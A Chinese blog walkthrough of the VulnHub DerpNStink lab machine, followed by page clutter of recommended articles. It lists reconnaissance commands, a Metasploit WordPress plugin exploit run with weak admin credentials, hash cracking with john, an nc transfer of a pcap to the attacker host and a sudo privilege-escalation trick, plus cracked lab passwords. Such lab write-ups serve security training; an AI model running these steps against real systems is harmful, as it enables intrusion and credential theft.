vulnhub/DerpNStink

最新推荐文章于 2025-06-06 16:31:51 发布
最新推荐文章于 2025-06-06 16:31:51 发布
阅读量533 收藏 12
点赞数 26
分类专栏: vulnhub靶场 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45230030/article/details/138348855
版权

下载地址:https://github.com/rishabhkant07/Privilege-Escalation-Cheatsheet-Vulnhub-

其中也附有相应的WP,也是有很多种方法,怎么方便怎么来吧。

下载完靶机,更改网络为NAT模式,与攻击机设置为同一网卡模式。

攻击机(kali)IP:192.168.59.143

主机发现与端口扫描

1、查看靶机 mac 地址

2、netdiscover 扫描主机 IP ,发现主机 IP 为 192.168.59.135

3、nmap 扫描主机端口开放,发现 21、22、80 端口开放

nmap -p- -A 192.168.59.135

web渗透

1、dirb 扫描网站目录

dirb http://192.168.59.135

2、浏览器访问 http://192.168.59.135 ,F12 查看发现第一个 flag

并在 /webnotes/info.txt 获得提示,需要在 hosts 配置 DNS

3、访问扫描到的 /weblog 页面,自动跳转到了 http://derpnstink.local/weblog/

4、所以配置 hosts 文件,访问 /weblog/wp-admin

5、尝试弱口令,admin:admin 成功登录

getshell

1、使用 wpscan 扫描,刚开始扫描不到,后面反应过来没有配置 hosts 文件,配置后成功扫描

wpscan --url http://derpnstink.local/weblog

在知道 wordpress 的管理员账号的前提下,利用 msf 的模块来 getshell,wpscan 扫描到很多插件存在漏洞,在这里使用 Slideshow Gallery 存在的漏洞

search slideshow				
use 1		
show option
set rhosts 192.168.59.135
set targeturi /weblog/	#设置目标的url目录地址
set wp_user admin
set wp_password admin
run

成功 getshell

提权

1、尝试 sudo 提权,发现需要输入密码,失败,翻看配置文件,发现了目标数据库的账号和密码

python -c 'import pty; pty.spawn("/bin/bash")'		# 获得交互式命令行
cd /var/www/html/weblog
ls
cat wp-config.php

root:mysql

2、访问 /php/phpmyadmin ,连接数据库

3、访问 wp_posts 表发现 flag2.txt

4、在 wp_users 表发现两个账户密码

unclestinky:$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
admin:$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/

5、尝试直接破解 unclestinky 的密码,使用 john 去跑 rockyou 字典,将其密码保存到hashes.txt

john hashes.txt --wordlist=rockyou.txt

#	得到密码为 wedgie57

6、在靶机home目录下发现两个用户,mrderp/stinky

7、使用刚刚得到的密码尝试登陆一下,发现ssh不支持密码密码登陆,只可以通过指纹登陆

8、21 端口开放,尝试登陆一下,stinky 用户登录成功

9、进入 files 目录,发现有个 ssh 目录,一直进入,到最后发现有个 key.txt ,可能是 ssh 登录需要的 key ,将其下载下来

cd /files/ssh/ssh/ssh/ssh/ssh/ssh/ssh
get key.txt
exit

10、使用下载下来的 key.txt 通过 ssh 连接靶机,但是发现报错 sign_and_send_pubkey: no mutual signature supported ,上网查了一下原因,发现是因为 ssh 证书失效了,在后面加一段命令 -o PubkeyAcceptedKeyTypes=+ssh-rsa 即可成功连接

cp key.txt skey.rsa
ls -al skey.rsa
chmod 600 skey.rsa
// ssh -i skey.rsa 192.168.59.135 -l stinky   # 报错
ssh -i skey.rsa 192.168.59.135 -l stinky -o PubkeyAcceptedKeyTypes=+ssh-rsa

11、在 desktop 目录发现第三个 flag

12、在 documents 目录发现了一个叫 derpissues.pcap 的文件分析包(pcap后缀)

将其下载到本地,通过 wireshark 查看

# kali 
nc -lvvp 1234 > derpissues.pcap

# 靶机
nc -nv 192.168.59.143 1234 < derpissues.pcap

想快速知道账号和密码,前提是知道目标登录的是 web ,登录一般形式都是 POST 请求,所以我们使用 wireshark 进行过滤,只看 POST 请求那么就可以快速找到用户名和密码

http.request.method == "POST"

# 确定目标靶机用户 mrderp 的密码为:derpderpderpderpderpderpderp

13、ssh 连接 mrderp 用户,在 Desktop 目录下发现文件 helpdesk.log ,查看后发现一个提示

14、根据上述提示访问页面 mrderp ALL=(ALL) /home/mrderp/binaries/derpy* - Pastebin.com ,得到提示:

mrderp ALL=(ALL) /home/mrderp/binaries/derpy*

允许 mrderp 用户在主机上以 root 用户权限读写执行 /home/mrderp/binaries/ 目录下 derpy 开头的文件

15、发现没有 binaries 目录,自己创建目录并编辑一个以 derpy 开头的文件

mkdir binaries/
cd binaries/
pwd
echo '/bin/bash' >> derpy.sh		# echo一个shell到derpy.sh文件里
chmod 777 derpy.sh
sudo ./derpy.sh

16、在 /root/Desktop 目录下,获得第四个 flag

至此打靶结束

厂商资源分享网站
qq_56248592的博客
10-03 7460
华为(Huawei)是一家全球知名的电信设备和消费电子产品制造商,成立于1987年,总部位于中国深圳。专注于Web应用程序的安全风险,发布了十大最佳Web应用程序安全风险列表,帮助开发人员和安全专家了解和防范常见的Web应用程序安全风险。综上所述,这些公司、组织及社区在网络安全、云计算、大数据、人工智能等领域有着丰富的研究经验和成果,为相关行业和领域的发展做出了重要贡献。专注于网络安全的技术社区,提供安全资讯、技术交流和安全培训等服务,致力于提升网络安全领域的技术水平和安全意识。
vulnhub:DeRPnStiNK
墨染的博客
10-09 1816
环境搭建 下载虚拟机包文件VMware或VirtualBox打开,配置网络模式为NAT模式。 下载链接:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova hash:949e2f8a7d63fabdc55c675c95efe022 开搞 flag1 首先nmap -sP 192.168.14.1/24一波找一下...
vulnhubDerpNStink靶机
wbplife的博客
08-04 978
我刚开始用的是kali上面的searchsploit工具命令进行搜索版本利用搜索出来的脚本文件,但失败了,也可能是利用的脚本不对,大家可以多尝试几个脚本,看看能否成功,也希望与大家讨论。我在这找了一个有关版本的相关提权文件,有一个本地提权漏洞CVE-2021-4034, 作用有点类似于sudo,允许用户以另一个用户身份执行命令。是需要更新本地DNS主机文件,思考应该是需要我们把IP和对应的域名进行添加到hosts文件中,但不知道域名是什么。通过目录扫描出来的,还有目录//weblog/wp-admin/
vulnhub靶场】VulnHub2018_DeRPnStiNK靶机提权
qq_46421742的博客
07-27 472
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
DerpNStink打靶思路详解(vulnhub
MCcming的博客
03-16 1121
尝试一下弱口令你妹的,只允许使用密钥登陆。
Vulnhub DeRKnStiNK
zhaji001
01-15 1235
简介 虚拟机下载: https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机: 使用Virtualbox虚拟机导入OVA 攻击机:kali linux  0x001  信息收集 nmap扫描网络找到VM ip地址  nmap -sn 192.168.1.100-254 Nmap scan report for 192.168.1.105 H...
小白的靶机-VulnHub-DerpNStink
wo41ge的博客
12-17 430
继续 继续 淦靶机 靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 目标:得到root权限&找到四个flag.txt ok 开始操作了 开机界面就是个这 轻车熟路 的搞一下 找到了此次CTF目标计算机IP地址:192.168.120.136 综合信息 21端口--FTP 22端口--SSH 80端口--HTTP 优先看看80端口 直接访问 F12找一找 作者可太行了 这不就有了吗 flag1=52E37291AEDF6A46D7D
vulnhub系列:DeRPnStiNK
jq_j37的博客
08-07 776
vulnhub系列:DeRPnStiNK靶机,打靶文章
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3438
每台都做一做,然后记录在博客里.供自己和大家一起学习.
免费白嫖一个网站
Qian120920的博客
01-27 1万+
登录过程很简单,按照网站提供的步骤登录就可以取,需要上传自己的邮箱号和身份证正面就可以,而且很多人觉得做完网站后需要备案很麻烦而热铁盒可以直接做网站,无需备案。注册成功后就可以登录,然后点击新网站,然后设置自己喜欢的域名但是“.rth1.link”的后缀不可以改,如果自己买了域名可以改,但是热铁盒里如果要改域名需要注册VIP,本人不太建议。如果你现在想要拥有一个自己的网站但又不知道怎么弄或者觉得网址后缀太贵了,不想买。那么这篇文章就可以帮助你。设置完域名后点开index.html,将里面的内容替换成。
web网站目录爆破工具Dirb使用指南
热门推荐
liver100day的博客
11-18 2万+
文章目录工具简介命令参数基本使用列举具有特定扩展名列表的目录将输出保存到磁盘忽略不必要的状态码速度延迟不递归(-r)显示不存在页面不对网址(-t)强制使用结尾的“ /”HTTP授权进行扫描代理网址后言 工具简介 dirb是一个基于字典的web目录扫描工具,查找现有的(和/或隐藏的)Web对象,通过对Web服务器发起基于字典的攻击并分析响应的数据。 采用递归的方式来获取更多的目录,它还支持代理和http认证限制访问的网站,是在信息收集阶段获取目标信息常用工具手段。 命令参数 格式:dirb <url_b
FunboxGaoKao
weixin_52865886的博客
03-02 342
发现开启ftp服务并可匿名访问,将文件下载至本地并查看。发现存在用户名sky,尝试hydra爆破。访问80端口毫无收获。获得ftp账户和密码。
星瀚实验室第一代仿真靶场演练报告
dzqxwzoe的博客
09-07 74
靶场模拟一家规模在一百人左右的数字传媒公司,公司总部在重庆,在成都设立一办事处。公司共计以下五个部门。在评估期间,在xhlab.com的网络上发现了几个令人担忧的漏洞。在执行攻击时,作者能够访问多台机器,这主要是由于过时的补丁和糟糕的安全配置。在测试期间,部分系统成功入侵,从而控制了网络中的部分系统。这些系统以及有关如何获得访问权限的简要说明在以下部分中列出。受损机器概述如下主机名对应公网IP对应内网IP—|—|—WEB0110.10.80.210.50.10.8蜜罐1无WEB02。
OSCP-DIGITALWORLD.LOCAL DEVELOPMENT靶场复现
weixin_69678131的博客
04-03 674
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者和此公众号不为此承担任何责任。跟hackersecretpage,还有一个/test.pcap前两个访问了之后没有任何信息,那就下载一下流量包来看一下。再次登录之后发现了2条报错信息,很重要好看一下,其中ereg_replace()函数,我们来看一下是否有什么漏洞。之后对所有内容进行一下翻译,发现了一些有用的信息,用户David,还有一些二进制。解密出了一个HUH?
渗透测试 10 --- 扫描 web目录 (dirb、wfuzz、wpscan、nikto)
墨鱼菜鸡
07-17 4937
github 更多工具:https://github.com/topics/dirb github 上 fuzz 工具、字典:https://github.com/search?q=fuzz 当使用一个工具扫描完成后,如果没发现漏洞,可以使用其他 web 扫描工具再扫描下,因为每个工具可能侧重点不一样,扫描出来的漏洞就不一样。 关键字 ...
【网络安全】SRC漏洞挖掘思路/手法分享
等风来
06-03 452
本文总结了多个实用的渗透测试技巧,涵盖接口安全、权限管理、数据泄露等多个方面。主要包括:主机URL复制差异、GET请求并发实现、密码明文获取方法、文件上传黑名单绕过、优惠券逻辑漏洞测试、用户信息越权访问、多重参数修改越权、复杂ID收集技巧、参数删除实现越权、权限管理参数空值测试、Cookie参数越权、Host头修改越权、并发测试场景、HTTP方法滥用、前端限制绕过、分隔符注入攻击、脏数据绕过频率限制、数组参数篡改以及邀请权限提升漏洞等
零基础在实践中学习网络安全-皮卡丘靶场(第十一期-目录遍历模块)
最新发布
2404_89737060的博客
06-06 554
最适和新手学习的皮卡丘靶场教学
网络安全问题及对策研究
06-03 1021
摘 要网络安全问题一直是近年来社会乃至全世界十分关注的重要性问题,网络关乎着我们的生活,政治,经济等多个方面,致力解决网络安全问题以及给出行之有效的安全策略是网络安全领域的一大目标。本论文简述了课题的开发背景,描述和定义了网络安全的内容和范围,着重于根据网络安全问题频发的不同角度分析其原因,包活网络安全现状中出现的信息篡改、网络攻击、病毒传播或交易威胁等,从具体实例出发,详细描述了网络安全事件出现的问题,原因及后果。针对不同的网络安全问题,提出了可预防和解决网络安全问题的技术策略和管理方案,针对技术应用过程
网络安全方向在校生有哪些证书适合考取?
ailx10
05-27 1110
网络安全领域,证书并非核心竞争力。作者花费1.1万考取CISSP证书后,发现高薪职位还需OSCP等更多认证。同事通过OSCP获得安全总监职位,而自己仍在基础岗位。2024年行业寒冬导致企业裁员、降薪,证书培训价格大幅下跌。最终感悟:实力远胜证书,花钱就能拿到的认证已丧失价值。行业变化证明,真正的能力才是立足之本。
Vulnhub篇potato靶机学习笔记及整理
Vulnhub是一个在线平台,为网络安全爱好者提供一系列的“虚拟机”,这些虚拟机通常被称为“靶机”,含有各种安全漏洞,用于教育和测试目的。在渗透测试的学习和实践中,Vulnhub成为了一个非常受欢迎的资源。本知识点...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值